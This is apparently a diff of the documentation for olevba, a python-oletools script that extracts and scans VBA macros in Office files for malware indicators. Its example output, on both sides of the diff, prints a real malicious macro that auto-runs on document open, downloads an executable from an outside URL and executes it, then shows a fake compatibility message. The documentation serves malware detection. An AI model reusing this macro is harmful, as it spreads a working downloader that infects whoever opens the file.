-                        content (Hex, Base64, StrReverse, Dridex).          </code></pre>
-<h3 id="examples">Examples</h3>
-<p>Scan a single file:</p>
-<pre><code>olevba.py file.doc</code></pre>
-<p>Scan a single file, stored in a Zip archive with password &quot;infected&quot;:</p>
-<pre><code>olevba.py malicious_file.xls.zip -z infected</code></pre>
-<p>Scan a single file, showing all obfuscated strings decoded:</p>
-<pre><code>olevba.py file.doc --decode</code></pre>
-<p>Scan VBA source code extracted into a text file:</p>
-<pre><code>olevba.py -i source_code.vba</code></pre>
-<p>Scan a collection of files stored in a folder:</p>
-<pre><code>olevba.py MalwareZoo/VBA/*</code></pre>
-<p>Scan all .doc and .xls files, recursively in all subfolders:</p>
-<pre><code>olevba.py MalwareZoo/VBA/*.doc MalwareZoo/VBA/*.xls -r</code></pre>
-<p>Scan all .doc files within all .zip files with password, recursively:</p>
-<pre><code>olevba.py MalwareZoo/VBA/*.zip -r -z infected -f *.doc</code></pre>
-<h3 id="detailed-analysis-mode-default-for-single-file">Detailed analysis mode (default for single file)</h3>
-<p>When a single file is scanned, or when using the option -d, all details of the analysis are displayed.</p>
-<p>For example, checking the malware sample <a href="https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/">DIAN_caso-5415.doc</a>:</p>
-<pre><code>&gt;olevba.py c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
-===============================================================================
-FILE: DIAN_caso-5415.doc.malware in c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip
-Type: OLE
--------------------------------------------------------------------------------
-VBA MACRO ThisDocument.cls
-in file: DIAN_caso-5415.doc.malware - OLE stream: Macros/VBA/ThisDocument
-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-Option Explicit
-Private Declare Function URLDownloadToFileA Lib &quot;urlmon&quot; (ByVal FVQGKS As Long,_
-ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
-ByVal HQTLDG As Long) As Long
-Sub AutoOpen()
-    Auto_Open
-End Sub
-Sub Auto_Open()
-SNVJYQ
-End Sub
-Public Sub SNVJYQ()
-    OGEXYR &quot;http://germanya.com.ec/logs/test.exe&quot;, Environ(&quot;TMP&quot;) &amp; &quot;\sfjozjero.
-exe&quot;
-End Sub
-Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
-    Dim HRKUYU, lala As Long
-    HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
-    If HRKUYU = 0 Then OGEXYR = True
-    Dim YKPZZS
-    YKPZZS = Shell(PHHWIV, 1)
-    MsgBox &quot;El contenido de este documento no es compatible con este equipo.&quot; &amp;
-vbCrLf &amp; vbCrLf &amp; &quot;Por favor intente desde otro equipo.&quot;, vbCritical, &quot;Equipo no
- compatible&quot;
-    lala = URLDownloadToFileA(0, &quot;http://germanya.com.ec/logs/counter.php&quot;, Envi
-ron(&quot;TMP&quot;) &amp; &quot;\lkjljlljk&quot;, 0, 0)
-    Application.DisplayAlerts = False
-    Application.Quit
-End Function
-Sub Workbook_Open()
-    Auto_Open
-End Sub
-
-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-ANALYSIS:
-+------------+----------------------+-----------------------------------------+
-| Type       | Keyword              | Description                             |
-+------------+----------------------+-----------------------------------------+
-| AutoExec   | AutoOpen             | Runs when the Word document is opened   |
-| AutoExec   | Auto_Open            | Runs when the Excel Workbook is opened  |
-| AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
-| Suspicious | Lib                  | May run code from a DLL                 |
-| Suspicious | Shell                | May run an executable file or a system  |
-|            |                      | command                                 |
-| Suspicious | Environ              | May read system environment variables   |
-| Suspicious | URLDownloadToFileA   | May download files from the Internet    |
-| IOC        | http://germanya.com. | URL                                     |
-|            | ec/logs/test.exe&quot;    |                                         |
-| IOC        | http://germanya.com. | URL                                     |
-|            | ec/logs/counter.php&quot; |                                         |
-| IOC        | germanya.com         | Executable file name                    |
-| IOC        | test.exe             | Executable file name                    |
-| IOC        | sfjozjero.exe        | Executable file name                    |
-+------------+----------------------+-----------------------------------------+</code></pre>
-<h3 id="triage-mode-default-for-multiple-files">Triage mode (default for multiple files)</h3>
-<p>When several files are scanned, or when using the option -t, a summary of the analysis for each file is displayed. This is more convenient for quick triage of a collection of suspicious files.</p>
-<p>The following flags show the results of the analysis:</p>
-<ul>
-<li><strong>OLE</strong>: the file type is OLE, for example MS Office 97-2003</li>
-<li><strong>OpX</strong>: the file type is OpenXML, for example MS Office 2007+</li>
-<li><strong>?</strong>: the file type is not supported</li>
-<li><strong>M</strong>: contains VBA Macros</li>
-<li><strong>A</strong>: auto-executable macros</li>
-<li><strong>S</strong>: suspicious VBA keywords</li>
-<li><strong>I</strong>: potential IOCs</li>
-<li><strong>H</strong>: hex-encoded strings (potential obfuscation)</li>
-<li><strong>B</strong>: Base64-encoded strings (potential obfuscation)</li>
-<li><strong>D</strong>: Dridex-encoded strings (potential obfuscation)</li>
-</ul>
-<p>Here is an example:</p>
-<pre><code>c:\&gt;olevba.py \MalwareZoo\VBA\samples\*
-Flags       Filename
------------ -----------------------------------------------------------------
-OLE:MASI--- \MalwareZoo\VBA\samples\DIAN_caso-5415.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_1.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_2.doc.malware
-OLE:MASI--- \MalwareZoo\VBA\samples\DRIDEX_3.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_4.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_5.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_6.doc.malware
-OLE:MAS---- \MalwareZoo\VBA\samples\DRIDEX_7.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_8.doc.malware
-OLE:MASIHBD \MalwareZoo\VBA\samples\DRIDEX_9.xls.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_A.doc.malware
-OLE:------- \MalwareZoo\VBA\samples\Normal_Document.doc
-OLE:M------ \MalwareZoo\VBA\samples\Normal_Document_Macro.doc
-OpX:MASI--- \MalwareZoo\VBA\samples\RottenKitten.xlsb.malware
-OLE:MASI-B- \MalwareZoo\VBA\samples\ROVNIX.doc.malware
-OLE:MA----- \MalwareZoo\VBA\samples\Word within Word macro auto.doc</code></pre>
-<hr />
-<h2 id="how-to-use-olevba-in-python-applications">How to use olevba in Python applications</h2>
-<p>olevba may be used to open a MS Office file, detect if it contains VBA macros, extract and analyze the VBA source code from your own python applications.</p>
-<p>IMPORTANT: olevba is currently under active development, therefore this API is likely to change.</p>
-<h3 id="import-olevba">Import olevba</h3>
-<p>First, import the <strong>oletools.olevba</strong> package, using at least the VBA_Parser and VBA_Scanner classes:</p>
-<pre><code>from oletools.olevba import VBA_Parser, VBA_Scanner</code></pre>
-<h3 id="parse-a-ms-office-file">Parse a MS Office file</h3>
-<p>To parse a file on disk, create an instance of the <strong>VBA_Parser</strong> class, providing the name of the file to open as parameter. For example:</p>
-<pre><code>vba = VBA_Parser(&#39;my_file_with_macros.doc&#39;)</code></pre>
-<p>The file may also be provided as a bytes string containing its data. In that case, the actual filename must be provided for reference, and the file content with the data parameter. For example:</p>
-<pre><code>myfile = &#39;my_file_with_macros.doc&#39;
-filedata = open(myfile, &#39;rb&#39;).read()
-vba = VBA_Parser(myfile, data=filedata)</code></pre>
-<p>VBA_Parser will raise an exception if the file is not a supported format, either OLE (MS Office 97-2003) or OpenXML (MS Office 2007+).</p>
-<h3 id="detect-vba-macros">Detect VBA macros</h3>
-<p>The method <strong>detect_vba_macros</strong> of a VBA_Parser object returns True if VBA macros have been found in the file, False otherwise.</p>
-<pre><code>if vba.detect_vba_macros():
-    print &#39;VBA Macros found&#39;
-else:
-    print &#39;No VBA Macros found&#39;</code></pre>
-<p>Note: The detection algorithm looks for streams and storage with specific names in the OLE structure, which works fine for all the supported formats listed above. However, for some formats such as PowerPoint 97-2003, this method will always return False because VBA Macros are stored in a different way which is not yet supported by olevba.</p>
-<p>Moreover, if the file contains an embedded document (e.g. an Excel workbook inserted into a Word document), this method may return True if the embedded document contains VBA Macros, even if the main document does not.</p>
-<h3 id="extract-vba-macro-source-code">Extract VBA Macro Source Code</h3>
-<p>The method <strong>extract_macros</strong> extracts and decompresses source code for each VBA macro found in the file (possibly including embedded files). It is a generator yielding a tuple (filename, stream_path, vba_filename, vba_code) for each VBA macro found.</p>
-<ul>
-<li>filename: If the file is OLE (MS Office 97-2003), filename is the path of the file. If the file is OpenXML (MS Office 2007+), filename is the path of the OLE subfile containing VBA macros within the zip archive, e.g. word/vbaProject.bin.</li>
-<li>stream_path: path of the OLE stream containing the VBA macro source code</li>
-<li>vba_filename: corresponding VBA filename</li>
-<li>vba_code: string containing the VBA source code in clear text</li>
-</ul>
-<p>Example:</p>
-<pre><code>for (filename, stream_path, vba_filename, vba_code) in vba.extract_macros():
-    print &#39;-&#39;*79
-    print &#39;Filename    :&#39;, filename
-    print &#39;OLE stream  :&#39;, stream_path
-    print &#39;VBA filename:&#39;, vba_filename
-    print &#39;- &#39;*39
-    print vba_code</code></pre>
-<h3 id="analyze-vba-source-code">Analyze VBA Source Code</h3>
-<p>Note: this API is under active development and may change in the future.</p>
-<p>The class <strong>VBA_Scanner</strong> can be used to scan the source code of a VBA module to find obfuscated strings, suspicious keywords, IOCs, auto-executable macros, etc.</p>
-<p>First, create a VBA_Scanner object with a string containing the VBA source code (for example returned by the extract_macros method). Then call the methods <strong>scan</strong> or <strong>scan_summary</strong> to get the results of the analysis.</p>
-<p>scan() takes an optional argument include_decoded_strings: if set to True, the results will contain all the encoded strings found in the code (Hex, Base64, Dridex) with their decoded value.</p>
-<p><strong>scan</strong> returns a list of tuples (type, keyword, description), one for each item in the results.</p>
-<ul>
-<li>type may be either 'AutoExec', 'Suspicious', 'IOC', 'Hex String', 'Base64 String' or 'Dridex String'.</li>
-<li>keyword is the string found for auto-executable macros, suspicious keywords or IOCs. For obfuscated strings, it is the decoded value of the string.</li>
-<li>description provides a description of the keyword. For obfuscated strings, it is the encoded value of the string.</li>
-</ul>
-<p>Example:</p>
-<pre><code>vba_scanner = VBA_Scanner(vba_code)
-results = vba_scanner.scan(include_decoded_strings=True)
-for kw_type, keyword, description in results:
-    print &#39;type=%s - keyword=%s - description=%s&#39; % (kw_type, keyword, description)</code></pre>
-<p>The function <strong>scan_vba</strong> is a shortcut for VBA_Scanner(vba_code).scan():</p>
-<pre><code>results = scan_vba(vba_code, include_decoded_strings=True)
-for kw_type, keyword, description in results:
-    print &#39;type=%s - keyword=%s - description=%s&#39; % (kw_type, keyword, description)</code></pre>
-<p><strong>scan_summary</strong> returns a tuple with the number of items found for each category: (autoexec, suspicious, IOCs, hex, base64, dridex).</p>
-<h3 id="detect-auto-executable-macros-deprecated">Detect auto-executable macros (deprecated)</h3>
-<p><strong>Deprecated</strong>: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.</p>
-<p>The function <strong>detect_autoexec</strong> checks if VBA macro code contains specific macro names that will be triggered when the document/workbook is opened, closed, changed, etc.</p>
-<p>It returns a list of tuples containing two strings, the detected keyword, and the description of the trigger. (See the malware example above)</p>
-<p>Sample usage:</p>
-<pre><code>from oletools.olevba import detect_autoexec
-autoexec_keywords = detect_autoexec(vba_code)
-if autoexec_keywords:
-    print &#39;Auto-executable macro keywords found:&#39;
-    for keyword, description in autoexec_keywords:
-        print &#39;%s: %s&#39; % (keyword, description)
-else:
-    print &#39;Auto-executable macro keywords: None found&#39;</code></pre>
-<h3 id="detect-suspicious-vba-keywords-deprecated">Detect suspicious VBA keywords (deprecated)</h3>
-<p><strong>Deprecated</strong>: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.</p>
-<p>The function <strong>detect_suspicious</strong> checks if VBA macro code contains specific keywords often used by malware to act on the system (create files, run commands or applications, write to the registry, etc).</p>
-<p>It returns a list of tuples containing two strings, the detected keyword, and the description of the corresponding malicious behaviour. (See the malware example above)</p>
-<p>Sample usage:</p>
-<pre><code>from oletools.olevba import detect_suspicious
-suspicious_keywords = detect_suspicious(vba_code)
-if suspicious_keywords:
-    print &#39;Suspicious VBA keywords found:&#39;
-    for keyword, description in suspicious_keywords:
-        print &#39;%s: %s&#39; % (keyword, description)
-else:
-    print &#39;Suspicious VBA keywords: None found&#39;</code></pre>
-<h3 id="extract-potential-iocs-deprecated">Extract potential IOCs (deprecated)</h3>
-<p><strong>Deprecated</strong>: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.</p>
-<p>The function <strong>detect_patterns</strong> checks if VBA macro code contains specific patterns of interest, that may be useful for malware analysis and detection (potential Indicators of Compromise): IP addresses, e-mail addresses, URLs, executable file names.</p>
-<p>It returns a list of tuples containing two strings, the pattern type, and the extracted value. (See the malware example above)</p>
-<p>Sample usage:</p>
-<pre><code>from oletools.olevba import detect_patterns
-patterns = detect_patterns(vba_code)
-if patterns:
-    print &#39;Patterns found:&#39;
-    for pattern_type, value in patterns:
-        print &#39;%s: %s&#39; % (pattern_type, value)
-else:
-    print &#39;Patterns: None found&#39;</code></pre>
-<h3 id="close-the-vba_parser">Close the VBA_Parser</h3>
-<p>After usage, it is better to call the <strong>close</strong> method of the VBA_Parser object, to make sure the file is closed, especially if your application is parsing many files.</p>
-<pre><code>vba.close()</code></pre>
-<hr />
-<h2 id="python-oletools-documentation">python-oletools documentation</h2>
-<ul>
-<li><a href="Home.html">Home</a></li>
-<li><a href="License.html">License</a></li>
-<li><a href="Install.html">Install</a></li>
-<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
-<li>Tools:
-<ul>
-<li><a href="olebrowse.html">olebrowse</a></li>
-<li><a href="oleid.html">oleid</a></li>
-<li><a href="olemeta.html">olemeta</a></li>
-<li><a href="oletimes.html">oletimes</a></li>
-<li><a href="olevba.html">olevba</a></li>
-<li><a href="pyxswf.html">pyxswf</a></li>
-<li><a href="rtfobj.html">rtfobj</a></li>
-</ul></li>
-</ul>
-</body>
-</html>
+<p>olevba</p>
+<p>======</p>
+<p>olevba is a script to parse OLE and OpenXML files such as MS Office documents</p>
+<p>(e.g. Word, Excel), to <strong>detect VBA Macros</strong>, extract their <strong>source code</strong> in clear text,</p>
+<p>and detect security-related patterns such as <strong>auto-executable macros</strong>, **suspicious</p>
+<p>VBA keywords** used by malware, anti-sandboxing and anti-virtualization techniques,</p>
+<p>and potential <strong>IOCs</strong> (IP addresses, URLs, executable filenames, etc).</p>
+<p>It also detects and decodes several common **obfuscation methods including Hex encoding,</p>
+<p>StrReverse, Base64, Dridex**, and extracts IOCs from decoded strings.</p>
+<p>It can be used either as a command-line tool, or as a python module from your own applications.</p>
+<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
+<p>olevba is based on source code from <a href="https://github.com/unixfreak0037/officeparser">officeparser</a></p>
+<p>by John William Davison, with significant modifications.</p>
+<h2 id="supported-formats">Supported formats</h2>
+<ul>
+<li><p>Word 97-2003 (.doc, .dot)</p></li>
+<li><p>Word 2007+ (.docm, .dotm)</p></li>
+<li><p>Word 2003 XML (.xml)</p></li>
+<li><p>Excel 97-2003 (.xls)</p></li>
+<li><p>Excel 2007+ (.xlsm, .xlsb)</p></li>
+<li><p>PowerPoint 2007+ (.pptm, .ppsm)</p></li>
+</ul>
+<h2 id="main-features">Main Features</h2>
+<ul>
+<li><p>Detect VBA macros in MS Office 97-2003 and 2007+ files</p></li>
+<li><p>Extract VBA macro source code</p></li>
+<li><p>Detect auto-executable macros</p></li>
+<li><p>Detect suspicious VBA keywords often used by malware</p></li>
+<li><p>Detect anti-sandboxing and anti-virtualization techniques</p></li>
+<li><p>Detect and decodes strings obfuscated with Hex/Base64/StrReverse/Dridex</p></li>
+<li><p>Extract IOCs/patterns of interest such as IP addresses, URLs, e-mail addresses and executable file names</p></li>
+<li><p>Scan multiple files and sample collections (wildcards, recursive)</p></li>
+<li><p>Triage mode for a summary view of multiple files</p></li>
+<li><p>Scan malware samples in password-protected Zip archives</p></li>
+<li><p>Python API to use olevba from your applications</p></li>
+</ul>
+<p>MS Office files encrypted with a password are also supported, because VBA macro code is never</p>
+<p>encrypted, only the content of the document.</p>
+<h2 id="about-vba-macros">About VBA Macros</h2>
+<p>See <a href="http://www.decalage.info/en/vba_tools">this article</a> for more information and technical details about VBA Macros</p>
+<p>and how they are stored in MS Office documents.</p>
+<h2 id="how-it-works">How it works</h2>
+<ol style="list-style-type: decimal">
+<li><p>olevba checks the file type: If it is an OLE file (i.e MS Office 97-2003), it is parsed right away.</p></li>
+<li><p>If it is a zip file (i.e. MS Office 2007+), olevba looks for all OLE files stored in it (e.g. vbaProject.bin), and opens them.</p></li>
+<li><p>olevba identifies all the VBA projects stored in the OLE structure.</p></li>
+<li><p>Each VBA project is parsed to find the corresponding OLE streams containing macro code.</p></li>
+<li><p>In each of these OLE streams, the VBA macro source code is extracted and decompressed (RLE compression).</p></li>
+<li><p>olevba looks for specific strings obfuscated with various algorithms (Hex, Base64, StrReverse, Dridex).</p></li>
+<li><p>olevba scans the macro source code and the deobfuscated strings to find suspicious keywords, auto-executable macros</p></li>
+</ol>
+<p>and potential IOCs (URLs, IP addresses, e-mail addresses, executable filenames, etc).</p>
+<h2 id="usage">Usage</h2>
+<pre><code>Usage: olevba.py [options] &lt;filename&gt; [filename2 ...]
+
+
+
+Options:
+
+  -h, --help            show this help message and exit
+
+  -r                    find files recursively in subdirectories.
+
+  -z ZIP_PASSWORD, --zip=ZIP_PASSWORD
+
+                        if the file is a zip archive, open first file from it,
+
+                        using the provided password (requires Python 2.6+)
+
+  -f ZIP_FNAME, --zipfname=ZIP_FNAME
+
+                        if the file is a zip archive, file(s) to be opened
+
+                        within the zip. Wildcards * and ? are supported.
+
+                        (default:*)
+
+  -t                    triage mode, display results as a summary table
+
+                        (default for multiple files)
+
+  -d                    detailed mode, display full results (default for
+
+                        single file)
+
+  -i INPUT, --input=INPUT
+
+                        input file containing VBA source code to be analyzed
+
+                        (no parsing)
+
+  --decode              display all the obfuscated strings with their decoded
+
+                        content (Hex, Base64, StrReverse, Dridex).          </code></pre>
+<h3 id="examples">Examples</h3>
+<p>Scan a single file:</p>
+<pre><code>olevba.py file.doc</code></pre>
+<p>Scan a single file, stored in a Zip archive with password &quot;infected&quot;:</p>
+<pre><code>olevba.py malicious_file.xls.zip -z infected</code></pre>
+<p>Scan a single file, showing all obfuscated strings decoded:</p>
+<pre><code>olevba.py file.doc --decode</code></pre>
+<p>Scan VBA source code extracted into a text file:</p>
+<pre><code>olevba.py -i source_code.vba</code></pre>
+<p>Scan a collection of files stored in a folder:</p>
+<pre><code>olevba.py MalwareZoo/VBA/*</code></pre>
+<p>Scan all .doc and .xls files, recursively in all subfolders:</p>
+<pre><code>olevba.py MalwareZoo/VBA/*.doc MalwareZoo/VBA/*.xls -r</code></pre>
+<p>Scan all .doc files within all .zip files with password, recursively:</p>
+<pre><code>olevba.py MalwareZoo/VBA/*.zip -r -z infected -f *.doc</code></pre>
+<h3 id="detailed-analysis-mode-default-for-single-file">Detailed analysis mode (default for single file)</h3>
+<p>When a single file is scanned, or when using the option -d, all details of the analysis are displayed.</p>
+<p>For example, checking the malware sample <a href="https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/">DIAN_caso-5415.doc</a>:</p>
+<pre><code>&gt;olevba.py c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
+
+===============================================================================
+
+FILE: DIAN_caso-5415.doc.malware in c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip
+
+Type: OLE
+
+-------------------------------------------------------------------------------
+
+VBA MACRO ThisDocument.cls
+
+in file: DIAN_caso-5415.doc.malware - OLE stream: Macros/VBA/ThisDocument
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Option Explicit
+
+Private Declare Function URLDownloadToFileA Lib &quot;urlmon&quot; (ByVal FVQGKS As Long,_
+
+ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
+
+ByVal HQTLDG As Long) As Long
+
+Sub AutoOpen()
+
+    Auto_Open
+
+End Sub
+
+Sub Auto_Open()
+
+SNVJYQ
+
+End Sub
+
+Public Sub SNVJYQ()
+
+    OGEXYR &quot;http://germanya.com.ec/logs/test.exe&quot;, Environ(&quot;TMP&quot;) &amp; &quot;\sfjozjero.
+
+exe&quot;
+
+End Sub
+
+Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
+
+    Dim HRKUYU, lala As Long
+
+    HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
+
+    If HRKUYU = 0 Then OGEXYR = True
+
+    Dim YKPZZS
+
+    YKPZZS = Shell(PHHWIV, 1)
+
+    MsgBox &quot;El contenido de este documento no es compatible con este equipo.&quot; &amp;
+
+vbCrLf &amp; vbCrLf &amp; &quot;Por favor intente desde otro equipo.&quot;, vbCritical, &quot;Equipo no
+
+ compatible&quot;
+
+    lala = URLDownloadToFileA(0, &quot;http://germanya.com.ec/logs/counter.php&quot;, Envi
+
+ron(&quot;TMP&quot;) &amp; &quot;\lkjljlljk&quot;, 0, 0)
+
+    Application.DisplayAlerts = False
+
+    Application.Quit
+
+End Function
+
+Sub Workbook_Open()
+
+    Auto_Open
+
+End Sub
+
+
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ANALYSIS:
+
++------------+----------------------+-----------------------------------------+
+
+| Type       | Keyword              | Description                             |
+
++------------+----------------------+-----------------------------------------+
+
+| AutoExec   | AutoOpen             | Runs when the Word document is opened   |
+
+| AutoExec   | Auto_Open            | Runs when the Excel Workbook is opened  |
+
+| AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
+
+| Suspicious | Lib                  | May run code from a DLL                 |
+
+| Suspicious | Shell                | May run an executable file or a system  |
+
+|            |                      | command                                 |
+
+| Suspicious | Environ              | May read system environment variables   |
+
+| Suspicious | URLDownloadToFileA   | May download files from the Internet    |
+
+| IOC        | http://germanya.com. | URL                                     |
+
+|            | ec/logs/test.exe&quot;    |                                         |
+
+| IOC        | http://germanya.com. | URL                                     |
+
+|            | ec/logs/counter.php&quot; |                                         |
+
+| IOC        | germanya.com         | Executable file name                    |
+
+| IOC        | test.exe             | Executable file name                    |
+
+| IOC        | sfjozjero.exe        | Executable file name                    |
+
++------------+----------------------+-----------------------------------------+</code></pre>
+<h3 id="triage-mode-default-for-multiple-files">Triage mode (default for multiple files)</h3>
+<p>When several files are scanned, or when using the option -t, a summary of the analysis for each file is displayed.</p>
+<p>This is more convenient for quick triage of a collection of suspicious files.</p>
+<p>The following flags show the results of the analysis:</p>
+<ul>
+<li><p><strong>OLE</strong>: the file type is OLE, for example MS Office 97-2003</p></li>
+<li><p><strong>OpX</strong>: the file type is OpenXML, for example MS Office 2007+</p></li>
+<li><p><strong>?</strong>: the file type is not supported</p></li>
+<li><p><strong>M</strong>: contains VBA Macros</p></li>
+<li><p><strong>A</strong>: auto-executable macros</p></li>
+<li><p><strong>S</strong>: suspicious VBA keywords</p></li>
+<li><p><strong>I</strong>: potential IOCs</p></li>
+<li><p><strong>H</strong>: hex-encoded strings (potential obfuscation)</p></li>
+<li><p><strong>B</strong>: Base64-encoded strings (potential obfuscation)</p></li>
+<li><p><strong>D</strong>: Dridex-encoded strings (potential obfuscation)</p></li>
+</ul>
+<p>Here is an example:</p>
+<pre><code>c:\&gt;olevba.py \MalwareZoo\VBA\samples\*
+
+Flags       Filename
+
+----------- -----------------------------------------------------------------
+
+OLE:MASI--- \MalwareZoo\VBA\samples\DIAN_caso-5415.doc.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_1.doc.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_2.doc.malware
+
+OLE:MASI--- \MalwareZoo\VBA\samples\DRIDEX_3.doc.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_4.doc.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_5.doc.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_6.doc.malware
+
+OLE:MAS---- \MalwareZoo\VBA\samples\DRIDEX_7.doc.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_8.doc.malware
+
+OLE:MASIHBD \MalwareZoo\VBA\samples\DRIDEX_9.xls.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_A.doc.malware
+
+OLE:------- \MalwareZoo\VBA\samples\Normal_Document.doc
+
+OLE:M------ \MalwareZoo\VBA\samples\Normal_Document_Macro.doc
+
+OpX:MASI--- \MalwareZoo\VBA\samples\RottenKitten.xlsb.malware
+
+OLE:MASI-B- \MalwareZoo\VBA\samples\ROVNIX.doc.malware
+
+OLE:MA----- \MalwareZoo\VBA\samples\Word within Word macro auto.doc</code></pre>
+<hr />
+<h2 id="how-to-use-olevba-in-python-applications">How to use olevba in Python applications</h2>
+<p>olevba may be used to open a MS Office file, detect if it contains VBA macros, extract and analyze the VBA source code</p>
+<p>from your own python applications.</p>
+<p>IMPORTANT: olevba is currently under active development, therefore this API is likely to change.</p>
+<h3 id="import-olevba">Import olevba</h3>
+<p>First, import the <strong>oletools.olevba</strong> package, using at least the VBA_Parser and VBA_Scanner classes:</p>
+<pre><code>from oletools.olevba import VBA_Parser, VBA_Scanner</code></pre>
+<h3 id="parse-a-ms-office-file">Parse a MS Office file</h3>
+<p>To parse a file on disk, create an instance of the <strong>VBA_Parser</strong> class, providing the name of the file to open as parameter.</p>
+<p>For example:</p>
+<pre><code>vba = VBA_Parser(&#39;my_file_with_macros.doc&#39;)</code></pre>
+<p>The file may also be provided as a bytes string containing its data. In that case, the actual</p>
+<p>filename must be provided for reference, and the file content with the data parameter. For example:</p>
+<pre><code>myfile = &#39;my_file_with_macros.doc&#39;
+
+filedata = open(myfile, &#39;rb&#39;).read()
+
+vba = VBA_Parser(myfile, data=filedata)</code></pre>
+<p>VBA_Parser will raise an exception if the file is not a supported format, either OLE (MS Office 97-2003) or OpenXML</p>
+<p>(MS Office 2007+).</p>
+<h3 id="detect-vba-macros">Detect VBA macros</h3>
+<p>The method <strong>detect_vba_macros</strong> of a VBA_Parser object returns True if VBA macros have been found in the file,</p>
+<p>False otherwise.</p>
+<pre><code>if vba.detect_vba_macros():
+
+    print &#39;VBA Macros found&#39;
+
+else:
+
+    print &#39;No VBA Macros found&#39;</code></pre>
+<p>Note: The detection algorithm looks for streams and storage with specific names in the OLE structure, which works fine</p>
+<p>for all the supported formats listed above. However, for some formats such as PowerPoint 97-2003, this method will</p>
+<p>always return False because VBA Macros are stored in a different way which is not yet supported by olevba.</p>
+<p>Moreover, if the file contains an embedded document (e.g. an Excel workbook inserted into a Word document), this method</p>
+<p>may return True if the embedded document contains VBA Macros, even if the main document does not.</p>
+<h3 id="extract-vba-macro-source-code">Extract VBA Macro Source Code</h3>
+<p>The method <strong>extract_macros</strong> extracts and decompresses source code for each VBA macro found in the file (possibly</p>
+<p>including embedded files). It is a generator yielding a tuple (filename, stream_path, vba_filename, vba_code)</p>
+<p>for each VBA macro found.</p>
+<ul>
+<li><p>filename: If the file is OLE (MS Office 97-2003), filename is the path of the file.</p>
+<p>If the file is OpenXML (MS Office 2007+), filename is the path of the OLE subfile containing VBA macros within the zip archive,</p>
+<p>e.g. word/vbaProject.bin.</p></li>
+<li><p>stream_path: path of the OLE stream containing the VBA macro source code</p></li>
+<li><p>vba_filename: corresponding VBA filename</p></li>
+<li><p>vba_code: string containing the VBA source code in clear text</p></li>
+</ul>
+<p>Example:</p>
+<pre><code>for (filename, stream_path, vba_filename, vba_code) in vba.extract_macros():
+
+    print &#39;-&#39;*79
+
+    print &#39;Filename    :&#39;, filename
+
+    print &#39;OLE stream  :&#39;, stream_path
+
+    print &#39;VBA filename:&#39;, vba_filename
+
+    print &#39;- &#39;*39
+
+    print vba_code</code></pre>
+<h3 id="analyze-vba-source-code">Analyze VBA Source Code</h3>
+<p>Note: this API is under active development and may change in the future.</p>
+<p>The class <strong>VBA_Scanner</strong> can be used to scan the source code of a VBA module to find obfuscated strings,</p>
+<p>suspicious keywords, IOCs, auto-executable macros, etc.</p>
+<p>First, create a VBA_Scanner object with a string containing the VBA source code (for example returned by the</p>
+<p>extract_macros method). Then call the methods <strong>scan</strong> or <strong>scan_summary</strong> to get the results of the analysis.</p>
+<p>scan() takes an optional argument include_decoded_strings: if set to True, the results will contain all the encoded</p>
+<p>strings found in the code (Hex, Base64, Dridex) with their decoded value.</p>
+<p><strong>scan</strong> returns a list of tuples (type, keyword, description), one for each item in the results.</p>
+<ul>
+<li><p>type may be either 'AutoExec', 'Suspicious', 'IOC', 'Hex String', 'Base64 String' or 'Dridex String'.</p></li>
+<li><p>keyword is the string found for auto-executable macros, suspicious keywords or IOCs. For obfuscated strings, it is</p></li>
+</ul>
+<p>the decoded value of the string.</p>
+<ul>
+<li>description provides a description of the keyword. For obfuscated strings, it is the encoded value of the string.</li>
+</ul>
+<p>Example:</p>
+<pre><code>vba_scanner = VBA_Scanner(vba_code)
+
+results = vba_scanner.scan(include_decoded_strings=True)
+
+for kw_type, keyword, description in results:
+
+    print &#39;type=%s - keyword=%s - description=%s&#39; % (kw_type, keyword, description)</code></pre>
+<p>The function <strong>scan_vba</strong> is a shortcut for VBA_Scanner(vba_code).scan():</p>
+<pre><code>results = scan_vba(vba_code, include_decoded_strings=True)
+
